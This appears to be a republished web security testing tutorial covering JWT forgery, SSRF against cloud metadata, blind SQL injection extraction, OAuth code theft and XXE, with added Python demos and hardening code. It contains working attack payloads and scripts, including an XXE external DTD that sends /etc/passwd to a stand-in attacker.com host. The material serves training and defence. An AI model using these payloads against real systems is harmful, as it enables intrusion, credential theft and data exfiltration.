
Introduction:
The modern web application landscape is a complex ecosystem of APIs, microservices, and identity standards, creating a vast attack surface for penetration testers and malicious actors alike. As applications shift toward stateless authentication and cloud-native architectures, vulnerabilities such as JSON Web Token (JWT) misconfigurations, Server-Side Request Forgery (SSRF), and OAuth authorization flaws have become prime targets for exploitation. This article provides a technical roadmap based on practical, hands-on web security testing, mirroring the skills validated by certifications like the Web RTA, to help security professionals identify, exploit, and mitigate these critical risks.
Learning Objectives:
- Understand how to identify and exploit common web vulnerabilities including SQL Injection (SQLi), XXE, and SSRF using manual and automated techniques.
- Master the art of attacking identity and access control mechanisms by manipulating JWT implementations and OAuth 2.0/OpenID Connect flows.
- Develop practical skills in using Linux command-line tools, Burp Suite, and custom scripts to chain vulnerabilities for maximum impact.
You Should Know:
1. Exploiting JWT Misconfigurations: From “None” Algorithm to Key Confusion
JSON Web Tokens are the backbone of modern API authentication, but implementation flaws often undermine them completely. The most common misconfigurations are weak HMAC signing secrets, verifiers that accept the “none” algorithm, and algorithm (key) confusion, where a verifier lets the token's own header decide which algorithm to use and ends up checking an HS256 signature with the RSA public key as the HMAC secret.
Step‑by‑step guide explaining what this does and how to use it:
1. Intercept the Token: Use Burp Suite to capture a request containing a JWT (usually in the `Authorization: Bearer
2. Analyze the Structure: Decode the JWT using a tool like `jwt.io` or the command line. You can use `jq` to parse the base64 parts if you script it:
#!/bin/bash
# Decode the JWT header and payload (the signature segment is ignored).
# Segments are base64url without '=' padding: restore the padding and swap
# '-' '_' for '+' '/' so that base64 -d accepts them.
b64url_decode() {
  local s; s=$(printf '%s' "$1" | tr '_-' '/+')
  while [ $(( ${#s} % 4 )) -ne 0 ]; do s="$s="; done
  printf '%s' "$s" | base64 -d
}
token="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.token_part"
header=$(b64url_decode "${token%%.*}")          # text before the first '.'
payload=$(b64url_decode "$(printf '%s' "$token" | cut -d '.' -f2)")
echo "Header: $header"
echo "Payload: $payload"
3. Test for “None” Algorithm: Modify the header to set the algorithm to “none”. Re-encode the header and payload (keeping the original payload) and set the signature to an empty string.
# Python snippet to craft a 'none' algorithm token (PyJWT: pip install pyjwt)
import jwt

# alg "none" with key=None: PyJWT emits header.payload. with an empty signature segment
token_none = jwt.encode({"user": "admin"}, key=None, algorithm="none")
print(token_none)
4. Brute-force Weak Secret: If the algorithm is HS256, attempt to crack the secret offline with a dictionary. hashcat mode 16500 takes the raw token; john's HMAC-SHA256 format expects `header.payload#<hex signature>`, so the base64url signature has to be converted first (jwt2john-style scripts do this).
# Save the captured token
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature" > jwt.txt
# hashcat: mode 16500 accepts the raw JWT directly
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
# john (jumbo): after converting the token to header.payload#hexsig in jwt.hash
john jwt.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256
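The checks in steps 2 to 4 and the key confusion the section title refers to, as an added Python example that is not code from the original article: it decodes the page's sample token (base64url with padding restored), forges an alg=none token including the capitalised spellings some filters miss, forges an HS256 token keyed with the server's public-key bytes, and shows a verifier that trusts the header's alg accepting both forgeries while one that pins the algorithm rejects them. The secret and the public-key PEM body are constructed for the example (the PEM is not a real key; for the confusion attack only its bytes matter), and only the standard library is used, so PyJWT is not required.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Constructed inputs for this example: the page's sample token, a made-up
# HS256 secret, and a stand-in for the RS256 public key PEM a server would
# publish. The PEM body is not a real RSA key; the attack only uses its bytes.
SAMPLE_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.token_part"
SERVER_SECRET = b"example-hs256-secret"
PUBLIC_KEY_PEM = (b"-----BEGIN PUBLIC KEY-----\n"
                  b"NOT-A-REAL-KEY-constructed-for-this-example\n"
                  b"-----END PUBLIC KEY-----\n")


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    # JWT segments omit '=' padding; put it back or base64 decoders complain.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """Step 2: read header and payload without checking the signature."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def _signing_input(header: dict, payload: dict) -> str:
    def compact(obj: dict) -> bytes:
        return json.dumps(obj, separators=(",", ":")).encode()
    return f"{b64url_encode(compact(header))}.{b64url_encode(compact(payload))}"


def sign_hs256(payload: dict, key: bytes) -> str:
    signing_input = _signing_input({"alg": "HS256", "typ": "JWT"}, payload)
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_none(payload: dict, alg_spelling: str = "none") -> str:
    """Step 3: alg=none with an empty signature segment. Filters that only
    reject the lowercase string are probed with spellings like 'None'."""
    return _signing_input({"alg": alg_spelling, "typ": "JWT"}, payload) + "."


def forge_key_confusion(payload: dict, public_key_pem: bytes) -> str:
    """Algorithm confusion: HS256 with the server's public key bytes as the
    HMAC secret. A verifier that takes alg from the header and hands the
    same key object to HS256 computes the same MAC and accepts it."""
    return sign_hs256(payload, public_key_pem)


def verify_vulnerable(token: str, key: bytes) -> Optional[dict]:
    """Trusts the token's own alg claim (the flaw). `key` is whatever the
    server passes as secretOrPublicKey; on an RS256 deployment that is the PEM."""
    header, payload = decode_unverified(token)
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = str(header.get("alg", ""))
    if alg.lower() == "none":
        return payload                      # unsigned token accepted as-is
    if alg == "HS256":
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        return payload if hmac.compare_digest(expected, b64url_decode(sig_b64)) else None
    return None                             # RS256 path omitted: not needed to show the flaw


def verify_hardened(token: str, key: bytes) -> Optional[dict]:
    """Pins the algorithm server-side before looking at the signature. This
    example issues HS256 only; an RS256 deployment would pin 'RS256' and use
    an RSA verify with the public key, never an HMAC."""
    header, payload = decode_unverified(token)
    header_b64, payload_b64, sig_b64 = token.split(".")
    if header.get("alg") != "HS256":
        return None                         # 'none', 'None', RS256, ... all rejected here
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return payload if hmac.compare_digest(expected, b64url_decode(sig_b64)) else None


if __name__ == "__main__":
    claims = {"user": "admin"}
    print(decode_unverified(SAMPLE_TOKEN))
    print("vulnerable accepts none:", verify_vulnerable(forge_none(claims), PUBLIC_KEY_PEM))
    print("vulnerable accepts confusion:", verify_vulnerable(forge_key_confusion(claims, PUBLIC_KEY_PEM), PUBLIC_KEY_PEM))
    print("hardened rejects both:", verify_hardened(forge_none(claims), SERVER_SECRET),
          verify_hardened(forge_key_confusion(claims, PUBLIC_KEY_PEM), SERVER_SECRET))
```

Against a real RS256 target the PEM is whatever the server publishes, and the bytes you HMAC with have to match what the server passes to its verifier exactly, trailing newline included; that is why confusion attempts often take several PEM variants before one is accepted.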
2. Server-Side Request Forgery (SSRF): Turning the Server into Your Proxy
SSRF lets an attacker make the server-side application issue requests to a destination of the attacker's choosing, including hosts that are only reachable from inside the network. It is commonly used to bypass firewalls, reach internal services (such as the cloud metadata endpoint), or port-scan the internal network.
Step‑by‑step guide explaining what this does and how to use it:
1. Identify Input Vectors: Look for features that fetch a URL from user input (e.g., “Import from URL,” webhooks, image uploads via URL).
2. Basic Bypass Techniques: Start with the loopback and internal addresses, including the IPv6 loopback and alternate spellings of `127.0.0.1` (e.g. `127.1`, decimal `2130706433`) that substring blocklists miss.
– `http://127.0.0.1:8080/admin`
– `http://localhost:22`
– `http://[::1]:80/`
3. Advanced Bypass using DNS: Use subdomains or DNS rebinding services to circumvent weak blocklists. Edit your `/etc/hosts` file locally for testing, or use a custom domain pointing to
4. Cloud Metadata Extraction: If the application is hosted on AWS, attempt to reach the Instance Metadata Service through the SSRF. The URLs below are what you supply in the vulnerable parameter; the server, not your machine, has to make the request. This works against IMDSv1; IMDSv2 requires a session token obtained with a PUT request and a custom header, which a plain GET-based SSRF usually cannot send.
# Attempt to fetch IAM role credentials via SSRF: list the roles, then read one role's credentials
curl "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
curl "http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE-NAME]"
5. Automating SSRF with Burp Intruder: Use Burp Intruder to fuzz for open ports on the internal network. Payloads can be `http://192.168.1.1:80`, `http://192.168.1.1:22`, etc., monitoring for differences in response time or content length.
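Steps 2 and 3 in working form, as an added Python example that is not code from the original article: a substring blocklist of the kind the bypasses target, next to a validator that parses address literals in their alternate encodings, resolves hostnames, and decides on the resolved address rather than the hostname string. DNS is replaced by a constructed lookup table (internal.corp, cdn.example and their addresses are made up) so it runs offline; system_resolver shows the real call.

```python
import ipaddress
import socket
from typing import Callable, List, Optional, Tuple, Union
from urllib.parse import urlsplit

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Constructed stand-in for DNS so the example runs offline. Names and
# addresses are made up: one attacker-registered name that points inside the
# network (the step 3 trick), one ordinary public host.
FAKE_DNS = {
    "internal.corp": ["10.0.0.5"],
    "cdn.example": ["93.184.216.34"],
}


def fake_resolver(host: str) -> List[str]:
    return FAKE_DNS.get(host.lower(), [])


def system_resolver(host: str) -> List[str]:
    """Real lookup via getaddrinfo (not used by the offline demo)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def naive_blocklist_allows(url: str) -> bool:
    """Substring blocklist on the hostname: the kind of check steps 2-3 bypass."""
    host = urlsplit(url).hostname or ""
    blocked = ("127.0.0.1", "localhost", "169.254.169.254", "10.", "192.168.")
    return not any(bad in host for bad in blocked)


def literal_to_ip(host: str) -> Optional[IPAddr]:
    """Parse an address literal in every spelling a blocklist tends to miss."""
    try:
        return ipaddress.ip_address(host)            # 127.0.0.1, ::1, ::ffff:127.0.0.1
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(int(host, 0))   # 2130706433, 0x7f000001
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))  # 127.1, 0x7f.1 (libc shorthand)
    except OSError:
        return None


def is_internal(ip: IPAddr) -> bool:
    """Loopback, RFC 1918, link-local (the metadata address), unspecified,
    reserved: anything that is not a public address."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                          # ::ffff:10.0.0.5 -> 10.0.0.5
    return not ip.is_global


def ssrf_safe_target(url: str,
                     resolver: Callable[[str], List[str]] = fake_resolver) -> Tuple[bool, str]:
    """Resolve first, then judge the address, never the hostname string.
    Returns (allowed, reason). The fetcher should connect to the address
    checked here instead of resolving again; otherwise a DNS-rebinding name
    can answer with a public address now and an internal one a moment later."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    literal = literal_to_ip(host)
    if literal is not None:
        addresses = [literal]
    else:
        addresses = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addresses:
        return False, f"{host} did not resolve"
    for ip in addresses:
        if is_internal(ip):
            return False, f"{host} -> {ip} is not a public address"
    return True, f"{host} -> {addresses[0]}"


if __name__ == "__main__":
    for candidate in ("http://2130706433/admin", "http://[::1]:80/", "http://internal.corp/",
                      "https://cdn.example/img.png"):
        print(candidate, naive_blocklist_allows(candidate), ssrf_safe_target(candidate))
```

Every address in the answer is checked, not just the first, because a name can return a mix of public and internal records and the client library decides which one it connects to.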
3. SQL Injection (SQLi): Manual Exploitation Beyond SQLMap
While automated tools are useful, manual SQL injection is crucial for navigating complex WAFs and blind scenarios. Boolean-based and time-based blind injections are essential skills.
Step‑by‑step guide explaining what this does and how to use it:
1. Detection: Inject a single quote (`'`) to break the original query, or a logical payload like `' OR 1=1-- -` that keeps it syntactically valid but changes the result.
2. Boolean-Based Blind (Manual): Determine the database name length by asking true/false questions.
# Payload to check if the first character of the database name is 'a' (ASCII 97)
' AND (SELECT ascii(substring(database(),1,1))) = 97 -- -
If the page loads normally (true condition), the character is ‘a’. If it errors or shows a different result, it’s false.
3. Time-Based Blind (MySQL): When no visible output changes, use sleep commands and measure the response time.
# Check if the current user is root by inducing a 5 second delay
' AND IF((SELECT user()) = 'root@localhost', sleep(5), null) -- -
4. Extracting Data with the Linux Command Line (cURL): Automate the boolean process in bash. `--get --data-urlencode` makes curl URL-encode the quote, spaces and comment sequence; pasted raw into the URL the payload would be mangled.
#!/bin/bash
# Simple boolean-based extraction (conceptual): recover database() one
# character at a time by asking "is character $i equal to ASCII $ascii?"
# and looking for a marker ("Welcome") that only appears on the true branch.
for i in {1..30}; do
  found=0
  for ascii in {32..126}; do
    if curl -s --get "http://target.com/page.php" \
         --data-urlencode "id=1' AND ascii(substring(database(),$i,1))=$ascii-- -" \
         | grep -q "Welcome"; then
      printf "\x$(printf %x "$ascii")"
      found=1
      break
    fi
  done
  [ "$found" -eq 1 ] || break   # no character matched: end of the name
done
echo
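The boolean extraction above against a real oracle, as an added Python example that is not the article's code. An in-memory SQLite database stands in for the target (the table names, the admin password and the "Welcome" marker are constructed), the page concatenates the id parameter exactly as step 1 describes, and extract() goes beyond the bash loop: it learns the length first and then binary-searches each character's code point, about 7 requests per character instead of one per candidate. SQLite's unicode(substr()) replaces MySQL's ascii(substring()); the payload shape is otherwise the same.

```python
import sqlite3
from typing import Callable

# Constructed target: an in-memory SQLite database standing in for the
# application's backend. Table names, the admin password and the "Welcome"
# marker are made up for this example.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE products (id INTEGER, name TEXT);
    INSERT INTO products VALUES (1, 'widget');
    CREATE TABLE users (username TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', 'S3cr3t!');
""")
STATS = {"requests": 0}


def vulnerable_page(id_param: str) -> str:
    """The injection point from step 1: the parameter is concatenated into
    the query, and the response only reveals whether a row came back."""
    sql = "SELECT name FROM products WHERE id=" + id_param
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "Error"
    return "Welcome, widget" if row else "Not found"


def direct_query(expr: str) -> str:
    """Ground truth for checking results (not something an attacker has)."""
    return str(conn.execute(f"SELECT {expr}").fetchone()[0])


def oracle(condition: str) -> bool:
    """One boolean question, shaped like the bash loop's payload."""
    STATS["requests"] += 1
    return "Welcome" in vulnerable_page(f"1 AND ({condition})-- -")


def extract(expr: str, max_len: int = 64, ask: Callable[[str], bool] = oracle) -> str:
    """Recover the string value of SQL expression `expr` through the oracle.
    The length is learned first, then each character's code point is found by
    binary search over printable ASCII: at most 7 questions per character
    instead of up to 95 with a linear scan."""
    length = 0
    while length < max_len and ask(f"length({expr}) > {length}"):
        length += 1
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126                      # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"unicode(substr({expr},{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    print(extract("(SELECT password FROM users WHERE username='admin')"), STATS)
```

The same extract() pulls any string expression the database can evaluate, for example extract("sqlite_version()"), which is the SQLite counterpart of the database() probe in the bash script.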
4. OAuth 2.0 Authorization Flaws: The Misconfigured Handshake
OAuth flaws often arise from improper validation of the `redirect_uri` or leakage of authorization codes. An attacker can steal a code and hijack a user’s account.
Step‑by‑step guide explaining what this does and how to use it:
1. Redirect_URI Bypass: Test if the endpoint allows open redirects. Change the `redirect_uri` parameter to a domain you control.
– Legit: `https://app.com/oauth/callback`
– Malicious: `https://attacker.com/steal.php`
2. Leaking the Code via the Redirect or Referer: If `redirect_uri` validation is lax, or the registered callback page itself has an open redirect, the authorization server sends the victim's browser to a page you control with the `code` in the query string; a callback page that loads third-party resources can also leak that URL through the Referer header.
3. CSRF on the OAuth Flow: Check that a `state` parameter is sent and validated on the callback. If it is missing, an attacker completes an authorization for their own provider account, keeps the resulting callback URL (which carries the attacker's code) and tricks the victim into opening it; the victim's session at the client is then linked to the attacker's provider account, and the attacker can log in as the victim through that provider afterwards.
4. Simulating the Flow with cURL: Once you have a stolen code, exchange it for an access token. Note that the `redirect_uri` here must match the one used in the authorization request, and a confidential client's secret is required; without the secret the usual route is to hand the stolen code to the legitimate client's own callback and be logged in as the victim.
# Exchange the stolen code for a token (POST request)
curl -X POST https://api.target.com/oauth/token \
  -d "client_id=YOUR_CLIENT_ID" \
  -d "client_secret=YOUR_CLIENT_SECRET" \
  -d "redirect_uri=https://attacker.com" \
  -d "code=STOLEN_AUTHORIZATION_CODE" \
  -d "grant_type=authorization_code"
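Steps 1 and 3 from the defender's side, as an added Python example that is not from the original article: a prefix-based `redirect_uri` check that the bypass URIs of step 1 pass, the exact-match check that stops them, and a `state` parameter that is generated per login, bound to the session, compared in constant time and consumed on first use. The client id, hosts and authorization endpoint are made up, and the session is a plain dict standing in for a server-side session store.

```python
import hmac
import secrets
from typing import Dict, Optional, Set
from urllib.parse import quote, urlsplit

# Constructed registration table and authorization-server URL for this
# example; client id, hosts and paths are made up.
AUTHORIZE_ENDPOINT = "https://auth.example/authorize"
REGISTERED_REDIRECTS: Dict[str, Set[str]] = {
    "client-123": {"https://app.example/oauth/callback"},
}


def redirect_allowed_weak(client_id: str, redirect_uri: str) -> bool:
    """Prefix match on the registered origin: the kind of check step 1 defeats
    (host suffixes, userinfo tricks and path traversal all start the same way)."""
    for registered in REGISTERED_REDIRECTS.get(client_id, ()):
        origin = "{0.scheme}://{0.netloc}".format(urlsplit(registered))
        if redirect_uri.startswith(origin):
            return True
    return False


def redirect_allowed_strict(client_id: str, redirect_uri: str) -> bool:
    """Exact string comparison against the registered value, as the OAuth 2.0
    Security BCP requires. No prefix, wildcard or same-host logic."""
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, set())


def begin_login(session: dict, client_id: str, redirect_uri: str) -> str:
    """Client side of step 3's fix: mint an unguessable state, remember it in
    the user's session and bind it to the authorization request."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return (f"{AUTHORIZE_ENDPOINT}?response_type=code"
            f"&client_id={quote(client_id, safe='')}"
            f"&redirect_uri={quote(redirect_uri, safe='')}&state={state}")


def finish_login(session: dict, callback_params: dict) -> Optional[str]:
    """Callback handler: returns the code to exchange, or None when the state
    is missing, does not match, or was already used (the abort(403) case)."""
    expected = session.pop("oauth_state", None)   # single use: a replay fails
    received = callback_params.get("state")
    if not expected or not isinstance(received, str) or not received.isascii():
        return None
    if not hmac.compare_digest(expected, received):
        return None
    return callback_params.get("code")


if __name__ == "__main__":
    for uri in ("https://app.example/oauth/callback",
                "https://app.example.attacker.example/cb",
                "https://app.example@attacker.example/cb"):
        print(uri, redirect_allowed_weak("client-123", uri), redirect_allowed_strict("client-123", uri))
    sess: dict = {}
    print(begin_login(sess, "client-123", "https://app.example/oauth/callback"))
    print(finish_login(sess, {"state": sess["oauth_state"], "code": "abc"}))
```

Popping the state rather than reading it is deliberate: a callback URL that leaked with a valid state cannot be replayed once the legitimate callback (or the first replay) has consumed it.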
5. XXE (XML External Entity) Injection: From File Read to RCE
XXE attacks exploit XML parsers that resolve external entities declared in a DOCTYPE. This can lead to reading local files, performing SSRF from the parser's host, or, in rare cases such as PHP's `expect://` wrapper being enabled, Remote Code Execution.
Step‑by‑step guide explaining what this does and how to use it:
1. Locate XML Input: Find endpoints that accept XML (e.g., SOAP APIs, file uploads, old web services). Change the `Content-Type` header to `application/xml` even if the form expects JSON.
2. Basic File Read: Inject a malicious DOCTYPE.
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
3. Blind XXE Exfiltration: If no output is reflected, use an external DTD to exfiltrate data via out-of-band (OOB) channels. Host a malicious DTD on your server.
Malicious DTD (hosted at attacker.com/xxe.dtd). `&#x25;` is the escaped `%`, so the inner parameter entity is declared rather than expanded too early; the `php://filter` wrapper base64-encodes the file so newlines survive the URL, and only works when the parser runs under PHP, so use a plain `file://` source elsewhere.
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%oob;
Injection payload (the body sent to the target)
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.com/xxe.dtd">
<foo>&exfil;</foo>
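The two payloads above seen from the receiving end, as an added Python example that is not the article's code and uses only the standard-library expat bindings: inspect_xml() records the DOCTYPE and entity declarations a document carries without fetching anything, which is enough to flag both the `file://` read and the external-DTD reference in a captured request, and parse_without_dtd() is the hardened parse that refuses any DOCTYPE or entity declaration before resolution can happen (the approach defusedxml takes). The sample documents are the page's payloads plus a constructed benign order document.

```python
import xml.parsers.expat
from typing import Dict


class DtdForbidden(ValueError):
    """Raised when a document carries a DOCTYPE or an entity declaration."""


# Constructed inputs: the page's own payloads, plus a benign document.
FILE_READ_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""

BLIND_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.com/xxe.dtd">
<foo>&exfil;</foo>"""

BENIGN = b"""<?xml version="1.0"?><order><item sku="42"/></order>"""


def inspect_xml(data: bytes) -> Dict[str, object]:
    """Triage helper: record the DOCTYPE and every entity declaration the
    parser sees, fetching nothing. Good enough to spot an XXE attempt in a
    captured request or a WAF log before it reaches a resolving parser."""
    findings: Dict[str, object] = {"doctype": None, "doctype_system_id": None,
                                   "entities": [], "external_refs": [], "parse_error": None}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings["doctype"] = name
        findings["doctype_system_id"] = sysid        # set for an external DTD reference

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        findings["entities"].append((name, sysid, bool(is_param)))

    def on_external_ref(context, base, sysid, pubid):
        findings["external_refs"].append(sysid)
        return 1                                     # report success to expat; nothing is fetched

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        findings["parse_error"] = str(exc)           # e.g. an undefined entity once the DTD is not loaded
    return findings


def parse_without_dtd(data: bytes) -> str:
    """Hardened parse: refuse any DOCTYPE, entity declaration or external
    entity reference up front, so file://, php://filter and external-DTD
    payloads never reach resolution. Returns the root element name."""
    parser = xml.parsers.expat.ParserCreate()
    root = []

    def forbid(*args):
        raise DtdForbidden("DOCTYPE and entity declarations are not accepted")

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = forbid
    parser.EntityDeclHandler = forbid
    parser.ExternalEntityRefHandler = forbid
    parser.StartElementHandler = on_start
    parser.Parse(data, True)
    return root[0]


if __name__ == "__main__":
    print(inspect_xml(FILE_READ_PAYLOAD))
    print(inspect_xml(BLIND_PAYLOAD))
    print(parse_without_dtd(BENIGN))
```

Rejecting at the DOCTYPE is the right granularity: a parser that merely declines to fetch external entities still has to handle the billion-laughs style of internal entity expansion, whereas a document that legitimately needs a DTD can be routed to a separate, sandboxed parser.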
6. API Security Hardening: Mitigation Commands and Configurations
Understanding exploitation is useless without knowing how to fix it. Here are configuration snippets for securing APIs against the attacks above.
Step‑by‑step guide explaining what this does and how to use it:
1. JWT Hardening (Node.js Example): Pin the algorithm server-side to the one that matches the key you pass: `['HS256']` with a shared secret, `['RS256']` with an RSA public key. Never let the token's header choose, and never pass a public key together with an HMAC algorithm, since that is exactly the key confusion from section 1.
// Using the jsonwebtoken library, explicitly specify the algorithms you issue
const jwt = require('jsonwebtoken');
jwt.verify(token, secretOrPublicKey, { algorithms: ['HS256'] }, (err, decoded) => {
  // A token whose header says none, RS256 or anything else fails here with err set;
  // without the algorithms option the library would trust the header's alg.
  if (err) { /* reject the request */ }
});
2. SSRF Prevention (Linux/Network Level): Block egress traffic from the application to internal ranges via iptables as a backstop; the application should still validate the resolved address itself.
# Block access to the metadata IP and internal ranges. Applied to the whole OUTPUT
# chain this also cuts loopback for every process on the host, so in practice
# restrict the rules to the application's user with -m owner --uid-owner <app-user>.
iptables -A OUTPUT -d 169.254.169.254 -j DROP
iptables -A OUTPUT -d 127.0.0.0/8 -j DROP
iptables -A OUTPUT -d 10.0.0.0/8 -j DROP
iptables -A OUTPUT -d 172.16.0.0/12 -j DROP
iptables -A OUTPUT -d 192.168.0.0/16 -j DROP
3. OAuth State Parameter: Always generate a cryptographically random `state` parameter and validate it on the callback.
# Python Flask example
import secrets
from flask import abort, request, session

# When starting the flow: bind an unguessable state to the user's session
state = secrets.token_urlsafe(16)
session['oauth_state'] = state
# Later, in the callback: pop so the value is single-use, reject if absent, compare in constant time
expected = session.pop('oauth_state', None)
received = request.args.get('state')
if not expected or not received or not secrets.compare_digest(expected, received):
    abort(403)
What Undercode Say:
- The Human Element Remains the Weakest Link: While these exploits target code, they often succeed because of developer assumptions—assuming no one will guess the JWT secret, or that internal IPs are unreachable. Secure coding practices must be reinforced with automated security testing in the CI/CD pipeline.
- Hands-On Skills Trump Theory: The shift toward practical certifications like Web RTA highlights the industry’s demand for testers who can chain these vulnerabilities. Knowing how to manually craft a blind SQLi payload or bypass an SSRF blocklist with DNS tricks is far more valuable than simply running a scanner. The future of web defense lies in understanding the attacker’s mindset, which requires continuous, hands-on lab practice.
Reported By: Sahil Ninnad – Hackers Feeds


